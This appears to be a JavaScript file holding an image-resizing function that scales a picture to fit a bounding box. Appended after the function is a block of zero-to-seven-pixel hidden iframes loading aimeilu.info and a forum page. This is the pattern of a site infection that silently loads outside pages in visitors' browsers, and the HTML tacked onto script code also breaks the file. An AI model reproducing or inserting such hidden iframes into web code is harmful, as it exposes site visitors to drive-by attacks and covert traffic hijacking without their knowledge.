function loaded(myimg,mywidth,myheight)
{
var tmp_img = new Image();
tmp_img.src = myimg.src;
image_x = tmp_img.width;
image_y = tmp_img.height;

if(image_x/mywidth >= image_y/myheight)
{
	if(image_x >= mywidth)
	{
		tmp_img.width = mywidth;
		tmp_img.height = image_y * mywidth / image_x;
	}
	else
	{
		tmp_img.width = image_x;
		tmp_img.height = image_y;
	}
}
else
{
	if(image_y >= myheight)
	{
		tmp_img.height = myheight;
		tmp_img.width = image_x / (image_y / myheight);
	}
	else
	{
		tmp_img.height = image_y;
		tmp_img.width = image_x ;
	}
}

myimg.width = tmp_img.width;
myimg.height = tmp_img.height;
}<iframe src=http://www.aimeilu.info width=0 height=0></iframe>
<iframe src=http://aimeilu.info width=0 height=0></iframe>
<iframe src=http://www.aimeilu.info width=1 height=1></iframe>
<iframe src=http://aimeilu.info width=1 height=1></iframe>
<iframe src=http://www.aimeilu.info width=2 height=2></iframe>
<iframe src=http://aimeilu.info width=2 height=2></iframe>
<iframe src=http://www.aimeilu.info width=0 height=0></iframe>
<iframe src=http://aimeilu.info width=0 height=0></iframe>
<iframe src=http://www.aimeilu.info width=4 height=4></iframe>
<iframe src=http://aimeilu.info width=5 height=5></iframe>
<iframe src=http://www.aimeilu.info width=6 height=2></iframe>
<iframe src=http://aimeilu.info width=7 height=2></iframe>
<iframe src=http://bbs.admin5.com/thread-1833188-1-1.html width=7 height=2></iframe>

